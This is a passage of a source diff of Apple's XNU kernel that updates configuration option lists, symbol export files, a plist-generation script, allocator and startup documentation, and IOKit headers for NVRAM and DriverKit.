CONFIG_SERIAL_KDP # KDP over serial # options CONFIG_KDP_INTERACTIVE_DEBUGGING # options CONFIG_TASKWATCH +options CONFIG_USER_NOTIFICATION # # # Kernel Power On Self Tests # @@ -752,11 +749,6 @@ options CONFIG_XNUPOST # # options PROC_REF_DEBUG # -# -# Kernel OS reason debug instrumentation -# -options OS_REASON_DEBUG # - # # Kernel Voucher Attr Manager for Activity Trace # @@ -772,6 +764,9 @@ options CONFIG_SYSDIAGNOSE # options CONFIG_CSR # options CONFIG_CSR_FROM_DT # +# Enable collection of IO Compression statistics +options CONFIG_IO_COMPRESSION_STATS # + # # Console options # diff --git a/config/MASTER.arm b/config/MASTER.arm index 0dbf52e8f..d5a077c24 100644 --- a/config/MASTER.arm +++ b/config/MASTER.arm @@ -16,9 +16,9 @@ # Standard Apple OS Configurations: # -------- ----- -- --------------- # -# KERNEL_BASE = [ arm xsmall msgb_small config_embedded config_enforce_signed_code config_zcache config_darkboot ARM_EXTRAS_BASE ] +# KERNEL_BASE = [ arm xsmall msgb_small config_embedded config_enforce_signed_code config_darkboot ARM_EXTRAS_BASE ] # KERNEL_RELEASE = [ KERNEL_BASE ] -# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug ] +# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug ] # KERNEL_DEBUG = [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug ] # BSD_BASE = [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_imageboot config_imageboot_img4 ] # BSD_RELEASE = [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ] @@ -50,7 +50,7 @@ # PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ] # PERF_DBG_DEV = [ PERF_DBG_BASE config_dtrace zleaks kdp_interactive_debugging interrupt_masked_debug ] # PERF_DBG_DEBUG = [ PERF_DBG_BASE config_dtrace zleaks kdp_interactive_debugging interrupt_masked_debug ] -# MACH_BASE = [ mach slidable vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_library_validation config_iosched config_telemetry config_sysdiagnose config_quiesce_counter phys_write_acct ] +# MACH_BASE = [ mach slidable vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_library_validation config_iosched config_telemetry config_sysdiagnose config_quiesce_counter phys_write_acct config_io_compression_stats ] # MACH_RELEASE = [ MACH_BASE config_skip_precise_user_kernel_time debugger_for_zone_info ] # MACH_DEV = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ] # MACH_DEBUG = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max importance_debug ] diff --git a/config/MASTER.arm64 b/config/MASTER.arm64 index 15846736a..e8e1a0f56 100644 --- a/config/MASTER.arm64 +++ b/config/MASTER.arm64 @@ -16,9 +16,9 @@ # Standard Apple OS Configurations: # -------- ----- -- --------------- # -# KERNEL_BASE = [ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_zcache config_darkboot ARM_EXTRAS_BASE ] +# KERNEL_BASE = [ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_darkboot ARM_EXTRAS_BASE ] # KERNEL_RELEASE = [ KERNEL_BASE ] -# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ] +# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ] # KERNEL_DEBUG = [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ] # BSD_BASE = [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas config_imageboot config_imageboot_img4 ] # BSD_RELEASE = [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ] @@ -52,7 +52,7 @@ # PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ] # PERF_DBG_DEV = [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ] # PERF_DBG_DEBUG = [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ] -# MACH_BASE = [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter phys_write_acct ] +# MACH_BASE = [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter phys_write_acct config_io_compression_stats ] # MACH_RELEASE = [ MACH_BASE config_skip_precise_user_kernel_time debugger_for_zone_info ] # MACH_DEV = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ] # MACH_DEBUG = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max importance_debug ] diff --git a/config/MASTER.arm64.BridgeOS b/config/MASTER.arm64.BridgeOS index 3fd4f903c..825b89919 100644 --- a/config/MASTER.arm64.BridgeOS +++ b/config/MASTER.arm64.BridgeOS @@ -16,9 +16,9 @@ # Standard Apple OS Configurations: # -------- ----- -- --------------- # -# KERNEL_BASE = [ arm64 xsmall msgb_large config_embedded config_enforce_signed_code config_requires_u32_munging config_zcache config_darkboot ARM_EXTRAS_BASE ] +# KERNEL_BASE = [ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_darkboot ARM_EXTRAS_BASE ] # KERNEL_RELEASE = [ KERNEL_BASE ] -# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ] +# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ] # KERNEL_DEBUG = [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ] # BSD_BASE = [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas config_imageboot config_imageboot_img4 ] # BSD_RELEASE = [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ] diff --git a/config/MASTER.arm64.MacOSX b/config/MASTER.arm64.MacOSX index 509472214..bdd95c53c 100644 --- a/config/MASTER.arm64.MacOSX +++ b/config/MASTER.arm64.MacOSX @@ -16,9 +16,9 @@ # Standard Apple OS Configurations: # -------- ----- -- --------------- # -# KERNEL_BASE = [ arm64 medium msgb_large config_arrow config_requires_u32_munging config_zcache config_delay_idle_sleep config_proc_udata_storage ARM_EXTRAS_BASE ] +# KERNEL_BASE = [ arm64 medium msgb_large config_arrow config_requires_u32_munging config_delay_idle_sleep config_proc_udata_storage config_uexc config_darkboot ARM_EXTRAS_BASE ] # KERNEL_RELEASE = [ KERNEL_BASE ] -# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ] +# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ] # KERNEL_DEBUG = [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ] # BSD_BASE = [ mach_bsd sysv_sem sysv_msg sysv_shm config_netboot config_imageboot config_workqueue psynch config_proc_uuid_policy config_coredump pgo config_personas ] # BSD_RELEASE = [ BSD_BASE ] @@ -40,7 +40,11 @@ # VPN = [ ipsec flow_divert necp content_filter ] # PF = [ pf pflog ] # MULTIPATH = [ multipath mptcp ] +#if defined(SOC_CONFIG_t8020) # HIBERNATION = [ ] +#else /*!(defined(SOC_CONFIG_t8020)*/ +# HIBERNATION = [ ] +#endif /*!(defined(SOC_CONFIG_t8020)*/ # IOKIT_BASE = [ iokit iokitcpp no_kernel_hid config_sleep iokitstats HIBERNATION ] # IOKIT_RELEASE = [ IOKIT_BASE ] # IOKIT_DEV = [ IOKIT_BASE iotracking ] @@ -53,7 +57,7 @@ # PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ] # PERF_DBG_DEV = [ PERF_DBG_BASE lock_stats zleaks alternate_debugger interrupt_masked_debug ] # PERF_DBG_DEBUG = [ PERF_DBG_BASE lock_stats zleaks alternate_debugger interrupt_masked_debug ] -# MACH_BASE = [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter config_arm_pfz ] +# MACH_BASE = [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter config_arm_pfz config_user_notification phys_write_acct ] # MACH_RELEASE = [ MACH_BASE debugger_for_zone_info ] # MACH_DEV = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ] # MACH_DEBUG = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max importance_debug ] diff --git a/config/MASTER.arm64.bcm2837 b/config/MASTER.arm64.bcm2837 index e1d6bfd92..4ce67ae91 100644 --- a/config/MASTER.arm64.bcm2837 +++ b/config/MASTER.arm64.bcm2837 @@ -17,9 +17,9 @@ # -------- ----- -- --------------- # # ARM_EXTRAS_BASE = [ nos_arm_pmap nos_arm_asm ] -# KERNEL_BASE = [ arm64 xsmall msgb_small config_embedded config_requires_u32_munging config_zcache ARM_EXTRAS_BASE ] +# KERNEL_BASE = [ arm64 xsmall msgb_small config_embedded config_requires_u32_munging ARM_EXTRAS_BASE ] # KERNEL_RELEASE = [ KERNEL_BASE ] -# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ] +# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ] # KERNEL_DEBUG = [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ] # BSD_BASE = [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas ] # BSD_RELEASE = [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ] diff --git a/config/MASTER.arm64.iPhoneOS b/config/MASTER.arm64.iPhoneOS index 98852a7f7..f16f3b906 100644 --- a/config/MASTER.arm64.iPhoneOS +++ b/config/MASTER.arm64.iPhoneOS @@ -16,9 +16,9 @@ # Standard Apple OS Configurations: # -------- ----- -- --------------- # -# KERNEL_BASE = [ arm64 xsmall msgb_large config_embedded config_enforce_signed_code config_requires_u32_munging config_zcache config_darkboot ARM_EXTRAS_BASE ] +# KERNEL_BASE = [ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_darkboot ARM_EXTRAS_BASE ] # KERNEL_RELEASE = [ KERNEL_BASE ] -# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ] +# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ] # KERNEL_DEBUG = [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ] # BSD_BASE = [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas config_imageboot config_imageboot_img4 ] # BSD_RELEASE = [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ] @@ -52,7 +52,7 @@ # PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ] # PERF_DBG_DEV = [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ] # PERF_DBG_DEBUG = [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ] -# MACH_BASE = [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter ] +# MACH_BASE = [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter config_io_compression_stats phys_write_acct ] # MACH_RELEASE = [ MACH_BASE config_skip_precise_user_kernel_time debugger_for_zone_info ] # MACH_DEV = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ] # MACH_DEBUG = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max importance_debug ] diff --git a/config/MASTER.x86_64 b/config/MASTER.x86_64 index 31d87fd6f..7bae7f33b 100644 --- a/config/MASTER.x86_64 +++ b/config/MASTER.x86_64 @@ -16,9 +16,9 @@ # Standard Apple OS Configurations: # -------- ----- -- --------------- # -# KERNEL_BASE = [ intel medium msgb_large config_requires_u32_munging config_zcache config_delay_idle_sleep config_proc_udata_storage vsprintf ] +# KERNEL_BASE = [ intel medium msgb_large config_requires_u32_munging config_delay_idle_sleep config_proc_udata_storage vsprintf ] # KERNEL_RELEASE = [ KERNEL_BASE ] -# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug ] +# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug ] # KERNEL_DEBUG = [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug ] # BSD_BASE = [ mach_bsd sysv_sem sysv_msg sysv_shm config_netboot config_imageboot config_imageboot_chunklist config_workqueue psynch config_proc_uuid_policy config_coredump pgo config_32bit_telemetry config_personas ] # BSD_RELEASE = [ BSD_BASE ] @@ -48,7 +48,7 @@ # PERF_DBG_RELEASE=[ PERF_DBG_BASE ] # PERF_DBG_DEV =[ PERF_DBG_BASE lock_stats ] # PERF_DBG_DEBUG = [ PERF_DBG_BASE lock_stats ] -# MACH_BASE = [ mach config_kext_basement mdebug ipc_debug config_mca config_vmx config_mtrr config_lapic config_telemetry importance_inheritance config_atm config_coalitions hypervisor config_iosched config_sysdiagnose config_mach_bridge_send_time copyout_shim phys_write_acct ] +# MACH_BASE = [ mach config_kext_basement mdebug ipc_debug config_mca config_vmx config_mtrr config_lapic config_telemetry importance_inheritance config_atm config_coalitions hypervisor config_iosched config_sysdiagnose config_mach_bridge_send_time copyout_shim phys_write_acct config_user_notification ] # MACH_RELEASE = [ MACH_BASE ] # MACH_DEV = [ MACH_BASE task_zone_info importance_trace config_ledger_interval_max ] # MACH_DEBUG = [ MACH_BASE task_zone_info importance_trace config_ledger_interval_max importance_debug ] diff --git a/config/MasterVersion b/config/MasterVersion index 7da98bbff..11d867f00 100644 --- a/config/MasterVersion +++ b/config/MasterVersion @@ -1,4 +1,4 @@ -20.3.0 +20.4.0 # The first line of this file contains the master version number for the kernel. # All other instances of the kernel version in xnu are derived from this file. diff --git a/config/Private.arm.exports b/config/Private.arm.exports index 8091f7218..a3af4d729 100644 --- a/config/Private.arm.exports +++ b/config/Private.arm.exports @@ -13,6 +13,7 @@ _ml_get_conttime_offset _ml_get_wake_timebase _ml_set_reset_time _proc_getcdhash +_ml_cpu_init_completed _cpu_broadcast_xcall _cpu_xcall _cpu_broadcast_immediate_xcall diff --git a/config/Private.arm64.exports b/config/Private.arm64.exports index 1c0e13e39..09e5a5df7 100644 --- a/config/Private.arm64.exports +++ b/config/Private.arm64.exports @@ -41,6 +41,7 @@ _sched_perfcontrol_edge_matrix_set _sched_perfcontrol_update_callback_deadline _thread_group_join_io_storage _thread_group_join_perf_controller +_ml_cpu_init_completed _ml_cpu_signal _ml_cpu_signal_deferred _ml_cpu_signal_retract @@ -70,8 +71,6 @@ _pmap_iommu_map _pmap_iommu_unmap _pmap_iommu_iovmfree _pmap_iommu_ioctl -_pmap_iommu_grant_page -_pmap_iommu_alloc_contiguous_pages _nvme_ppl_get_desc _sart_get_desc _t8020dart_get_desc diff --git a/config/Private.exports b/config/Private.exports index 28b023dd9..71f343419 100644 --- a/config/Private.exports +++ b/config/Private.exports @@ -3,7 +3,6 @@ __ZN15IORegistryEntry18setIndexedPropertyEjP8OSObject __ZNK15IORegistryEntry18getIndexedPropertyEj __ZN16IOPlatformExpert* __ZNK16IOPlatformExpert* -__ZN18IOMemoryDescriptor16setPreparationIDEv __ZTV16IOPlatformExpert __ZN18IODTPlatformExpert* __ZNK18IODTPlatformExpert* @@ -149,6 +148,8 @@ _bufattr_markisochronous _bufattr_markmeta _bufattr_markquickcomplete _bufattr_meta +_bufattr_markexpeditedmeta +_bufattr_expeditedmeta _bufattr_nocache _bufattr_passive _bufattr_quickcomplete @@ -466,6 +467,10 @@ _kern_packet_append _kern_packet_get_next _kern_packet_set_chain_counts _kern_packet_get_chain_counts +_kern_packet_trace_start +_kern_packet_trace_end +_kern_packet_is_traced +_kern_packet_trace_event _kern_pbufpool_alloc _kern_pbufpool_alloc_batch _kern_pbufpool_alloc_batch_callback @@ -491,6 +496,7 @@ _kern_config_is_development _kern_stack_snapshot_with_reason _kernel_debug_string _kext_receipt +_kext_receipt_set_queried _kmem_alloc_kobject:_kmem_alloc_kobject_external _kmem_alloc_pageable:_kmem_alloc_pageable_external _kx_qsort @@ -598,6 +604,8 @@ _pmap_load_image4_trust_cache _pmap_lockdown_image4_slab _pmap_lookup_in_static_trust_cache _pmap_lookup_in_loaded_trust_caches +_pmap_set_compilation_service_cdhash +_pmap_match_compilation_service_cdhash _port_name_to_task _port_name_to_thread _post_sys_powersource @@ -621,6 +629,7 @@ _proc_set_syscall_filter_callbacks _proc_set_syscall_filter_index _proc_set_syscall_filter_mask _proc_selfcsflags +_proc_skip_mtime_update _proc_starttime _proc_task _proc_uniqueid @@ -717,6 +726,7 @@ _throttle_lowpri_io_will_be_throttled _throttle_lowpri_window _throttle_set_thread_io_policy _throttle_get_thread_effective_io_policy +_throttle_thread_io_tier_above_metadata _timeout _timeout_with_leeway _tk_nin @@ -751,10 +761,12 @@ _utun_ctl_register_dtls _utun_pkt_dtls_input _vfs_context_bind _vfs_context_can_resolve_triggers +_vfs_context_dataless_materialization_is_prevented _vfs_context_get_special_port _vfs_context_set_special_port _vfs_context_is_dataless_manipulator _vfs_devvp +_vfs_get_thread_fs_private _vfs_getattr _vfs_getbyid _vfs_is_basesystem @@ -762,6 +774,7 @@ _vfs_mntlabel _vfs_mount_id _vfs_nativexattrs _vfs_set_root_unmounted_cleanly +_vfs_set_thread_fs_private _vfs_setcompoundopen _vfs_throttle_mask _vfs_vnodecovered diff --git a/config/Private.x86_64.exports b/config/Private.x86_64.exports index 7983266f3..83401d90a 100644 --- a/config/Private.x86_64.exports +++ b/config/Private.x86_64.exports @@ -2,9 +2,10 @@ _IOGetBootKeyStoreData _IOGetAPFSKeyStoreData _IOSetAPFSKeyStoreData _IOGetARVRootHashData -_IOSetARVRootHashData _IOGetARVManifestData -_IOSetARVManifestData +_IOGetBaseSystemARVRootHashData +_IOGetBaseSystemARVManifestData +_IOBaseSystemARVRootHashAvailable __Z33IOSKCopyKextIdentifierWithAddressm __ZN14IOPMrootDomain17requestUserActiveEP9IOServicePKc __ZN14IOPMrootDomain20claimSystemBootEventEP9IOServicejPKcP8OSObject @@ -113,6 +114,7 @@ _hv_ast_pending _hv_disable _hv_ept_pmap_create _hv_get* +_hv_io_notifier* _hv_release* _hv_set* _hv_trace* diff --git a/config/Unsupported.arm64.MacOSX.exports b/config/Unsupported.arm64.MacOSX.exports index dbe250852..6ad33d6fd 100644 --- a/config/Unsupported.arm64.MacOSX.exports +++ b/config/Unsupported.arm64.MacOSX.exports @@ -34,3 +34,8 @@ __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert4Ev __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert5Ev __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert6Ev __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert7Ev +_KUNCExecute +_KUNCGetNotificationID +_KUNCUserNotificationDisplayAlert +_KUNCUserNotificationDisplayFromBundle +_KUNCUserNotificationDisplayNotice diff --git a/config/Unsupported.exports b/config/Unsupported.exports index d83a6923b..cb5770754 100644 --- a/config/Unsupported.exports +++ b/config/Unsupported.exports @@ -1,9 +1,4 @@ _Debugger -_KUNCExecute -_KUNCGetNotificationID -_KUNCUserNotificationDisplayAlert -_KUNCUserNotificationDisplayFromBundle -_KUNCUserNotificationDisplayNotice _NDR_record _OSSpinLockTry _OSSpinLockUnlock diff --git a/config/Unsupported.x86_64.MacOSX.exports b/config/Unsupported.x86_64.MacOSX.exports index 927f16da9..b49ffcab9 100644 --- a/config/Unsupported.x86_64.MacOSX.exports +++ b/config/Unsupported.x86_64.MacOSX.exports @@ -14,3 +14,8 @@ __ZN5IORTC15_RESERVEDIORTC4Ev __ZN5IORTC15_RESERVEDIORTC5Ev __ZN5IORTC15_RESERVEDIORTC6Ev __ZN5IORTC15_RESERVEDIORTC7Ev +_KUNCExecute +_KUNCGetNotificationID +_KUNCUserNotificationDisplayAlert +_KUNCUserNotificationDisplayFromBundle +_KUNCUserNotificationDisplayNotice diff --git a/config/generate_symbolset_plist.sh b/config/generate_symbolset_plist.sh index a56a15f2f..744ae9c6b 100755 --- a/config/generate_symbolset_plist.sh +++ b/config/generate_symbolset_plist.sh @@ -15,6 +15,11 @@ if [ "${OUTPUT##*.}" != "plist" -o "${PLIST##*.}" != "plist" ]; then fi shift 2 +if [ $(egrep -c 'CFBundleIdentifier|OSBundleCompatibleVersion|CFBundleVersion' $PLIST) -lt 3 ]; then + echo "error: Invalid input Info.plist $PLIST" 1>&2 + exit 1 +fi + printf \ ' diff --git a/doc/allocators.md b/doc/allocators.md index 55a844ea8..bc9deb57c 100644 --- a/doc/allocators.md +++ b/doc/allocators.md @@ -56,7 +56,7 @@ For all `kalloc` or `kheap_alloc` variants, these advices apply: - If your allocation size is of fixed size, of a sub-page size, and done with the `Z_WAITOK` semantics (allocation can block), consider adding `Z_NOFAIL`, -- If you `bzero` the memory on allocation, prefer passing `Z_ZERO` which can be +- If you `bzero` the memory on allocation, instead pass `Z_ZERO` which can be optimized away more often than not. ### Considerations for zones @@ -83,7 +83,7 @@ Security wise, the following questions need answering: There are several allocation wrappers in XNU, present for various reasons ranging from additional accounting features (IOKit's `IONew`), conformance to -langauge requirements (C++ various `new` operators) or organical historical +language requirements (C++ various `new` operators) or organic historical reasons. `zalloc` and `kalloc` are considered the primitive allocation interfaces which diff --git a/doc/startup.md b/doc/startup.md index 15e587dfe..92e528f8c 100644 --- a/doc/startup.md +++ b/doc/startup.md @@ -189,6 +189,8 @@ Initializes the percpu subsystem. Rank 1: allocates the percpu memory, `percpu_foreach_base` and `percpu_foreach` become usable. +Rank 2: sets up static percpu counters. + `STARTUP_SUB_LOCKS` ------------------- @@ -205,7 +207,6 @@ tracing features). Available hooks are: - Rank 1: `LCK_MTX_DECLARE`. - `STARTUP_SUB_CODESIGNING` ------------------------- @@ -243,6 +244,21 @@ Initializes the Mach IPC subsystem. - Rank last: Final IPC initialization. +`STARTUP_SUB_SYSCTL` +------------------------- + +### Description + +Initializes the sysctl kernel subsystem + +### Rank usage + +- Rank 1: automatic `SYSCTL_NODE` registration. +- Rank 2: automatic `SYSCTL_OID` registration. +- Middle: other manual early registrations. +- Last: registrations of dummy nodes in the constant nodes to allow extension. + + `STARTUP_SUB_EARLY_BOOT` ------------------------ @@ -271,5 +287,3 @@ When the kernel locks down: ### Rank usage N/A. - - diff --git a/iokit/DriverKit/IOService.iig b/iokit/DriverKit/IOService.iig index 478a721f9..9c23a9be2 100644 --- a/iokit/DriverKit/IOService.iig +++ b/iokit/DriverKit/IOService.iig @@ -106,6 +106,15 @@ public: virtual kern_return_t Stop(IOService * provider) LOCAL; + /*! @function ClientCrashed + * @discussion Notification for kernel objects of a client crash. + * @param client Attached client. + * @param options No options are currently defined. + * @return kIOReturnSuccess on success. See IOReturn.h for error codes. + */ + virtual kern_return_t + ClientCrashed(IOService * client, uint64_t options); + /*! * @brief Obtain IOKit IORegistryEntryID. * @param registryEntryID IORegistryEntryID for the IOKit object. diff --git a/iokit/DriverKit/IOUserClient.iig b/iokit/DriverKit/IOUserClient.iig index 10c76c852..3c9633969 100644 --- a/iokit/DriverKit/IOUserClient.iig +++ b/iokit/DriverKit/IOUserClient.iig @@ -88,8 +88,9 @@ enum { * @field scalarOutput Array of scalars to return to the caller. * @field scalarOutputCount Count of scalars to return to the caller in scalarOutput. * @field structureOutput An OSData to be returned to the caller as structure output. - * A reference will be consumed by the caller. It is an error to set this field if - * structureOutputDescriptor was passed in + * This field should be set by the driver to an OSData object it created with + * the data to be returned, and the OSData instance will be released by the OS. + * It is an error for the driver to set this field if structureOutputDescriptor was passed in * @field structureOutputDescriptor A IOMemoryDescriptor specified by the caller for structure output. * @field structureOutputMaximumSize Maximum size of structure output specified by caller * or kIOUserClientVariableStructureSize. diff --git a/iokit/IOKit/IOKitKeysPrivate.h b/iokit/IOKit/IOKitKeysPrivate.h index 992e3a9fe..dbc6aaaf5 100644 --- a/iokit/IOKit/IOKitKeysPrivate.h +++ b/iokit/IOKit/IOKitKeysPrivate.h @@ -71,6 +71,12 @@ // care. #define kIONVRAMForceSyncNowPropertyKey "IONVRAM-FORCESYNCNOW-PROPERTY" +// GUID to address variables for the system NVRAM region +#define kIOKitSystemGUID "40A0DDD2-77F8-4392-B4A3-1E7304206516" +#define kIOKitSystemGUIDPrefix (kIOKitSystemGUID ":") +// Internal only key to give access to system region on internal builds +#define kIONVRAMSystemInternalAllowKey "com.apple.private.iokit.system-nvram-internal-allow" + // clientHasPrivilege security token for kIOClientPrivilegeSecureConsoleProcess typedef struct _IOUCProcessToken { @@ -90,12 +96,12 @@ typedef struct _IOUCProcessToken { #define kIOPlatformFunctionHandlerSet "IOPlatformFunctionHandlerSet" #define kIOPlatformFunctionHandlerMaxBusDelay "IOPlatformFunctionHandlerMaxBusDelay" -#define kIOPlatformMaxBusDelay "IOPlatformMaxBusDelay" +#define kIOPlatformMaxBusDelay "IOPlatformMaxBusDelay" #if defined(__i386__) || defined(__x86_64__) #define kIOPlatformFunctionHandlerMaxInterruptDelay "IOPlatformFunctionHandlerMaxInterruptDelay" -#define kIOPlatformMaxInterruptDelay "IOPlatformMaxInterruptDelay" +#define kIOPlatformMaxInterruptDelay "IOPlatformMaxInterruptDelay" #endif /* defined(__i386__) || defined(__x86_64__) */ diff --git a/iokit/IOKit/IOKitServer.h b/iokit/IOKit/IOKitServer.h index 55973bad6..3cb427cfc 100644 --- a/iokit/IOKit/IOKitServer.h +++ b/iokit/IOKit/IOKitServer.h @@ -169,6 +169,7 @@ extern io_object_t iokit_lookup_uext_ref_current_task(mach_port_name_t name); extern void iokit_retain_port( ipc_port_t port ); extern void iokit_release_port( ipc_port_t port ); +extern void iokit_make_port_send( ipc_port_t port ); extern void iokit_release_port_send( ipc_port_t port ); extern void iokit_lock_port(ipc_port_t port); diff --git a/iokit/IOKit/IOMemoryDescriptor.h b/iokit/IOKit/IOMemoryDescriptor.h index dc944236e..3ddc39fdf 100644 --- a/iokit/IOKit/IOMemoryDescriptor.h +++ b/iokit/IOKit/IOMemoryDescriptor.h @@ -840,6 +840,7 @@ class IOMemoryMap : public OSObject OSDeclareDefaultStructorsWithDispatch(IOMemoryMap); #ifdef XNU_KERNEL_PRIVATE public: + IOOptionBits fOptions; OSPtr fMemory; OSPtr fSuperMap; mach_vm_size_t fOffset; @@ -847,10 +848,7 @@ public: mach_vm_size_t fLength; task_t fAddressTask; vm_map_t fAddressMap; - IOOptionBits fOptions; upl_t fRedirUPL; - ipc_port_t fRedirEntry; - IOMemoryDescriptor * fOwner; uint8_t fUserClientUnmap; #if IOTRACKING IOTrackingUser fTracking; diff --git a/iokit/IOKit/IONVRAM.h b/iokit/IOKit/IONVRAM.h index 17f91c66a..d556b9fab 100644 --- a/iokit/IOKit/IONVRAM.h +++ b/iokit/IOKit/IONVRAM.h @@ -79,10 +79,12 @@ class IODTNVRAM : public IOService OSDeclareDefaultStructors(IODTNVRAM); private: + friend class IODTNVRAMVariables; + IONVRAMController *_nvramController; OSPtr _registryPropertiesKey; UInt8 *_nvramImage; - IOLock *_variableLock; + IORWLock *_variableLock; IOLock *_controllerLock; UInt32 _commonPartitionOffset; UInt32 _commonPartitionSize; @@ -151,7 +153,11 @@ private: IOReturn removePropertyInternal(const OSSymbol *aKey); IOReturn chooseDictionary(IONVRAMOperation operation, const uuid_t *varGuid, const char *variableName, OSDictionary **dict) const; - bool handleSpecialVariables(const char *name, uuid_t *guid, OSObject *obj, IOReturn *error); + IOReturn flushDict(const uuid_t *guid, IONVRAMOperation op); + bool handleSpecialVariables(const char *name, const uuid_t *guid, const OSObject *obj, IOReturn *error); + OSSharedPtr copyPropertyWithGUIDAndName(const uuid_t *guid, const char *name) const; + IOReturn removePropertyWithGUIDAndName(const uuid_t *guid, const char *name); + IOReturn setPropertyWithGUIDAndName(const uuid_t *guid, const char *name, OSObject *anObject); public: virtual bool init(IORegistryEntry *old, const IORegistryPlane *plane) APPLE_KEXT_OVERRIDE; diff --git a/iokit/IOKit/IOPMGR.h b/iokit/IOKit/IOPMGR.h index 66c3a0341..2a5457662 100644 --- a/iokit/IOKit/IOPMGR.h +++ b/iokit/IOKit/IOPMGR.h @@ -32,6 +32,7 @@ extern "C" { #include }; +#include #include /*! @@ -43,15 +44,25 @@ class IOPMGR : public IOService OSDeclareAbstractStructors(IOPMGR); public: + /*! + * @function enableCPUCore 